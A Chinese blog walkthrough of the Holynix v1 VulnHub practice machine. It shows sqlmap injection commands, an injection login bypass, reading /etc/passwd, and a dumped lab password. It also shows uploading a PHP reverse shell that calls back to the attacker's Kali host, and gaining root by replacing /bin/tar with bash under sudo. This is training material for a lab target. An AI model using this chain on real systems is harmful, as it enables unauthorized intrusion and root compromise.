Holynix-v1打靶渗透(权限提升)

最新推荐文章于 2024-07-31 21:07:43 发布
最新推荐文章于 2024-07-31 21:07:43 发布
阅读量327 收藏 4
点赞数 3
分类专栏: 打靶日常 文章标签: 网络安全 经验分享 web安全 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52487093/article/details/140808090
版权

靶机下载地址:Holynix: v1 ~ VulnHub

1. 主机发现+端口扫描+操作系统等信息收集

  1. 确认物理地址

  1. 主机扫描

  1. 端口扫描

  1. 操作系统等信息:

2. 目录扫描

3. web漏洞测试

3.1. 80端口初始页面

3.1.1. Login登录页面

  1. 进入login登录页面

  1. 输入账号密码进行抓包,利用sqlmap进行注入测试

  1. 测试发现存在字符型sql注入

  1. 尝试寻找存贮用户名+密码表【无信息】

  1. 尝试利用sql注入密码,越过审核【万能密码绕过】

  1. 尝试上传文件->权限不足->尝试查看上传的文件

  1. 将文件路径修改为/etc/passwd,点击【Display File】,文件读取成功

  1. 可以根据/etc/passwd这个文件看看有啥其他有bash的账户,可以发现有个用户叫etenenbaum,那么我们尝试SQL注入用这个用户登录

3.1.2. 利用sql注入查询账号密码[etenenbaum:P3n7@g0n0wN3d]

  1. sqlmap -r "test.txt" --dump -dbs –batch

  1. 找到可能的用户信息2

  1. 尝试登录

3.2. 文件上传漏洞

3.2.1. etenenbaum这个用户的权限可以上传文件,那我们试图上传php的反弹shell文件,先构造shell。

locate php-reverse
cp /usr/share/laudanum/php/php-reverse-shell.php .
vim php-reverse-shell.php

  1. 修改文件内容,将IP设置为kali的IP,端口改为监端口4444

  1. 用tar czf打包文件 -> 进行上传【记得勾选解压gzip文件】
tar czf shell.tar.gz php-reverse-shell.php

  1. 新开一个窗口,创建一个监听

  1. 上传后访问[kali上的]http://192.168.xxx.xxx/~etenenbaum/页面,发现了上传的文件.

  1. 点击访问shell.tar.zip,查看kali监听窗口 -> 获取shell

4. 权限提升

4.1. SUDO提权

  1. 输入sudo -l 查看允许用户使用的命令
sudo -l # 查看允许用户使用的命令

  1. 切换到/tmp目录下,将/bin/bash文件复制到/tmp目录下
cd /tmp
cp /bin/bash .

  1. 更改文件/tmp/bash的所有权,将所有者改为root
sudo chown root:root/tmp/bash

  1. 将现有的/bin/tar文件备份到bin/tar.bak中 -> 将/tmp/bash文件移动到/bin/tar
sudo mv /bin/tar /bin/tar.bak
sudo mv /tmp/bash /bin/tar

  1. 执行/bin/tar命令,成功提权
sudo /bin/tar

Kucei
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
vulnhub靶场{GoldenEye-v1靶场实战}
AerYinan的博客
02-10 3394
vulnhub靶场{GoldenEye-v1靶场实战}
Vulnhub靶机:HOLYNIX_ V1
LainWith的博客
12-23 2250
Holynix(此系列共2台)发布日期:2010年11月27日难度:中运行环境:VMware Workstation目标:取得 root 权限补充:需要手工设置靶机的MAC为00:0c:29:bc:05:de,然后重启靶机才能获取到靶机IP主机发现端口扫描+漏洞扫描万能密码文件包含漏洞mv提权。
红队打靶holynix打靶思路详解(vulnhub)
Bossfrank的博客
07-02 1394
本文是vulnhub靶机holynix的详细打靶过程。涉及的知识点包括SQL注入、POST型文件包含漏洞利用、越权漏洞、sudo权限利用提权等。发现POST型文件包含漏洞的参数是关键上,传合适的shell也需要一定技巧。
强化学习gym库中的Pendulum-v1/CartPole-v1游戏介绍
热门推荐
qq_43391414的博客
12-05 1万+
文章目录前言CartPole-v1游戏结束stateaction和rewardPendulum-v1通用操作 前言 gym官网:http://gym.openai.com/envs/#classic_control。 这gym的游戏真他妈坑,有很多游戏,但是只是粗略说说,而不说游戏具体规则。 不但如此,坑2:Pendulum-v0都已经被gym官方认定过时了,导入会报错。但是这个网站却还没有更新Pendulum-v1过来,蛋疼。 还有坑3:大家要看这个游戏的具体规则要进入github里面去看。例如Car
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8357
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
Docker Compose V2 安装 ClickHouse v20.6.8.5 经验分享
我不懂,可我不傻
07-23 847
ClickHouse 是一款开源的分布式列式数据库管理系统,专门设计用于高性能的大数据分析和查询。目前项目中用到的一个场景是将mongo的数据同步到clickhouse,使用clickhouse做报表,后续也将分享同步和使用方案使用 Docker Compose 部署单机版,小项目和自己测试够用了,生产使用集群,基于此方案后续有需要我再尝试整理自定义配置文件文档,自定义放到 config.d/.xml,用户配置放到 users.d/.xml添加集群配置文件:metrika.xml (单机版)
web安全基础学习
m0_71332744的博客
07-31 157
记录学习的原理,少有实操持续更新
网络安全之扫描探测阶段攻防手段(二)
子非渔
07-24 650
扫描探测阶段是攻击者对目标网络进行深入了解的关键步骤,同时也是防御者识别潜在威胁和加强安全防护的机会。
探索GAN 在改善网络安全方面的作用
知来者逆的博客
07-25 663
GAN 是一类机器学习框架,由两个神经网络组成——生成器和鉴别器。这两个网络在一个动态过程中竞争,生成器创建数据样本,鉴别器对其进行评估。生成器的目标是尽可能地生成与实际样本相似的数据。而鉴别器的目标是区分真实数据和生成的数据。在训练过程中,这种对抗关系促使两个网络不断改进。生成器会改进其输出以创建更令人信服的数据,而鉴别器则会提高其检测细微差异的能力。这种竞争会产生高度逼真的数据,使得 GAN 对于需要创建合成数据和网络安全中稳健测试场景的任务非常有用。
WEB安全】 PHP基础与数据库教学下(超详细)
weixin_60838266的博客
07-29 760
PHP 连接 MySQL在 PHP 使用 MySQL 数据库前,你需要先将它们连接。PHP 5 及以上版本建议使用以下方式连接 MySQL :MySQLi extension ("i" 意为 improved)在 PHP 早起版本中我们使用 MySQL 扩展。但该扩展在 2012 年开始不建议使用。我是该用 MySQLi ,还是 PDO?如果你需要一个简短的回答,即 "你习惯哪个就用哪个"。
WEB安全】 PHP基础文件知识完整教学中(超详细)
weixin_60838266的博客
07-29 557
正则表达式是用于描述字符排列和匹配模式的一种语法规则。它主要用于字符串的模式分割、匹配、查找及替换操作。到目前为止,我们前面所用过的精确(文本)匹配也是一种正则表达式。在PHP中,正则表达式一般是由正规字符和一些特殊字符(类似于通配符)联合构成的一个文本模式的程序性描述。正则表达式较重要和较有用的角色是验证用户数据的有效性检查。PHP中,正则表达式有三个作用:匹配,也常常用于从字符串中析取信息。用新文本代替匹配文本。将一个字符串拆分为一组更小的信息块。
网络安全相关竞赛比赛
黑战士的博客
07-18 1340
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
由“微软蓝屏”事件引发的对网络安全与系统稳定性的思考
qq_37524903的博客
07-23 871
近日,一场由微软视窗系统软件更新引发的全球性“微软蓝屏”事件,震动了整个科技领域。它不仅成为热点新闻,更是对全球 IT 基础设施韧性与安全性的一次深度检验。此次事件的源头是美国电脑安全技术公司“众击”提供的一个存在“缺陷”的软件更新,这个看似微不足道的问题,却如同一颗隐形炸弹,在全球范围内瞬间引爆。近 850 万台设备因此遭遇故障,波及航空、医疗、传媒等众多关键行业。其中,仅在美国就导致超过 2.3 万架次航班延误,其影响之广,令人瞠目结舌。
JAVA学习笔记
Jenlibein的博客
07-25 479
因为做笔记时,我的Typora尚未使用图床,图片在本地,逐个转换太耗时间,因而直接以压缩包形式存在此处,便于以后我有需要时取用。
第十四天学习笔记2024.7.25
shenxiaode的博客
07-25 816
root@git yy000]# echo "//这是一行java注释,不会被编译,能提交文件的可读性" > Test.java。[root@git yy000]# echo "//我是a员工,我不骄傲" >> Test.java。(2)[root@git ~]# mkdir /yy000 //存放git文件。//这是一行java注释,不会被编译,能提交文件的可读性。//这是一行java注释,不会被编译,能提交文件的可读性。//这是一行java注释,不会被编译,能提交文件的可读性。
近期代码报错解决笔记
yatingliu的博客
07-25 380
近期解决图数据的报错笔记
chromedriver-mac-x64_122.0.6217.0.zip
最新发布
07-31
chromedriver-mac-x64_122.0.6217.0.zip
多元宇宙算法优化长短记忆网络MVO-LSTM故障诊断分类【含Matlab源码 6074期】.zip
07-31
CSDN海神之光上传的全部代码均可运行,亲测可用,直接替换数据即可,适合小白; 1、代码压缩包内容 主函数:Main.m; 调用函数:其他m文件;无需运行 运行结果效果图; 2、代码运行版本 Matlab 2019b;若运行有误,根据提示修改;若不会,可私信博主; 3、运行操作步骤 步骤一:将所有文件放到Matlab的当前文件夹中; 步骤二:双击打开除Main.m的其他m文件; 步骤三:点击运行,等程序运行完得到结果; 4、仿真咨询 如需其他服务,可私信博主或扫描博主博客文章底部QQ名片; 4.1 CSDN博客或资源的完整代码提供 4.2 期刊或参考文献复现 4.3 Matlab程序定制 4.4 科研合作 智能优化算法优化LSTM分类预测系列程序定制或科研合作方向: 4.4.1 遗传算法GA/蚁群算法ACO优化LSTM 4.4.2 粒子群算法PSO/蛙跳算法SFLA优化LSTM 4.4.3 灰狼算法GWO/狼群算法WPA优化LSTM 4.4.4 鲸鱼算法WOA/麻雀算法SSA优化LSTM 4.4.5 萤火虫算法FA/差分算法DE优化LSTM 4.4.6 其他优化算法优化LSTM
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kucei

感谢您的喜欢

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值